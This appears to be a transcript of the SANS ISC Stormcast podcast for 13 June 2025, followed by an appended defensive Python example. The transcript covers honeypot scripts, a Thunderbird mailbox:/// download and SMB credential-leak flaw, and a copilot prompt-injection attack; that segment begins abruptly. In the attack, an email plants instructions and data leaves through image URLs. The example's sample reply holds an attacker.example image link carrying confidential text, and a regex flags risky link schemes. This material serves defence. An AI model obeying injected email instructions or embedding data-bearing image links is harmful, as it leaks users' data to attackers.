Hello and welcome to the Friday, June 13th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, and this episode, brought to you by the SANS.edu Undergraduate Certificate Program in Cybersecurity Fundamentals, is recorded in Jacksonville, Florida.

Well, in diaries today we have yet another diary by one of our undergraduate interns. This time William Constantino is looking into scripts that he wrote in order to summarize data from the DShield honeypot. Of course, we have shown scripts like this before, and when you're looking at the diary, I don't want you to look at it with sort of the lens where you say, hey, how am I using this script for myself? I think what's sometimes more useful is to look at it and ask: how could I create a script like this, and which ideas from William's script may actually apply to my particular use case? So look at what kind of data William extracted from the honeypot here. Is this useful to you or not? And then also look at how some of the details were implemented in these scripts. That's, I think, a better way to look at it. Creating these scripts yourself sometimes has real educational value, not just with respect to learning how to script, but also in sifting through the data yourself and looking at some of the oddities in the data and such. You're really becoming way more familiar with the data as a result, and as a result also better at actually extracting useful artifacts from these logs.
So the way the attack works is that an attacker starts out by sending an email. That email now basically includes a command that it wants the copilot to execute. Now it's not directly addressed at the copilot; it's addressed at the user. But that's again sort of where copilot gets confused, and that's where the real issue happens, where now an attacker is able to basically control copilot. The next part is then all about trying to exfiltrate the data, and that's done by actually inserting image links into the response. Part of the URL is then the data that's being exfiltrated. That also basically requires taking advantage of a couple of other weaknesses in how these links are created and constrained. Interesting vulnerability, and yes, this particular issue has been fixed by Microsoft. But overall, of course, this is more sort of one of those fundamental problems that probably exists in many similar systems.

And we've got an interesting vulnerability
in Thunderbird. It's not the most critical vulnerability. I think they actually only rated it as medium, but I think it is also a good follow-up to yesterday's vulnerability in KDE with Telnet links. This time it's mailbox links, so links starting with mailbox, colon, and then three slashes. Such a link apparently triggers an unsolicited download of whatever document is then listed after this mailbox colon protocol indicator. That can, first of all, be abused to basically just load a malicious PDF onto the user's desktop. It can also be used to trick the system into reaching out via SMB, which then gets us back to the usual credential leakage. So there are a bunch of different options available here. And I don't quite think that medium covers it really well. This is something where, again, the creativity of the attacker will play a large part in how this may potentially be exploited. And certainly don't forget to update Thunderbird if you're using it as your email client.
Well, and that's it for today. So thanks for listening. Thanks for any feedback that you have; please email it or send it to me via other means. And thanks for any good reviews that you leave on your favorite podcast platform. Next week, I will not have a podcast on Wednesday and Thursday due to some personal travel, but Monday, Tuesday, Friday should just work as usual. So talk to you again on Monday. Bye.
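Added example (not part of the podcast transcript, and not Microsoft's, Mozilla's or the ISC's own code) illustrating the defender-side checks behind the two stories above: the copilot exfiltration channel is an image link in the assistant's reply whose URL carries the stolen data, and the Thunderbird issue is a link using a locally handled scheme such as mailbox:///. The allow-listed image host, the sample assistant reply and the sample email body are all constructed for this example; the query-length threshold is an assumed tuning value.

```python
import re
from urllib.parse import urlsplit

# Image hosts the assistant is allowed to embed in a reply (constructed allow-list for this example).
TRUSTED_IMAGE_HOSTS = {"images.example-corp.internal"}

# Markdown image syntax ![alt](url ...), capturing alt text and the URL up to the first space or ')'.
MD_IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

# URI schemes a mail client may hand to a local handler (download, file open, SMB) instead of a browser.
RISKY_LINK_RE = re.compile(r"""\b(mailbox|telnet|file|smb):[^\s"'<>]+""", re.IGNORECASE)


def classify_image_url(url, max_query_len=64):
    """Return why an embedded image URL looks like an exfiltration channel, or None if acceptable."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"non-http scheme {parts.scheme!r}"
    host = parts.hostname or ""
    if host not in TRUSTED_IMAGE_HOSTS:
        return f"untrusted host {host!r}"
    # Even a trusted host can be misused if the model is induced to pack data into the query string
    # (max_query_len is an assumed threshold, not a value from the advisory).
    if len(parts.query) > max_query_len:
        return f"query string of {len(parts.query)} bytes"
    return None


def sanitize_assistant_output(text):
    """Replace untrusted images in assistant text with a placeholder; return (clean_text, findings)."""
    findings = []

    def replace(match):
        alt, url = match.group(1), match.group(2)
        reason = classify_image_url(url)
        if reason is None:
            return match.group(0)
        findings.append((url, reason))
        return f"[image removed: {alt.strip() or 'no alt text'}]"

    return MD_IMAGE_RE.sub(replace, text), findings


def find_risky_links(body):
    """List (scheme, uri) pairs for links in an email body that use a locally handled scheme."""
    return [(m.group(1).lower(), m.group(0)) for m in RISKY_LINK_RE.finditer(body)]


# Constructed sample assistant reply: one legitimate chart, one alt-less image whose query string carries text.
SAMPLE_REPLY = (
    "Here is the summary you asked for.\n"
    "![Q1 chart](https://images.example-corp.internal/q1.png)\n"
    "![](https://attacker.example/p.png?d=Q1%20revenue%20figures%20are%20confidential)\n"
)

# Constructed sample email body mixing a normal https link with a mailbox:/// link.
SAMPLE_EMAIL = (
    '<p>Open the attached report: <a href="mailbox:///tmp/report.pdf">report</a> '
    'or visit <a href="https://www.example.com/">our site</a>.</p>'
)

if __name__ == "__main__":
    clean, findings = sanitize_assistant_output(SAMPLE_REPLY)
    print(clean)
    for url, reason in findings:
        print(f"removed {url}: {reason}")
    for scheme, uri in find_risky_links(SAMPLE_EMAIL):
        print(f"risky {scheme} link: {uri}")
```

The image check runs on the assistant's output before it is rendered, which is where the exfiltration actually happens: stripping the markdown image means the client never fetches the attacker's URL. The link scan is the mail-gateway side of the Thunderbird story and only flags schemes; it is a detection aid, not a substitute for updating the client.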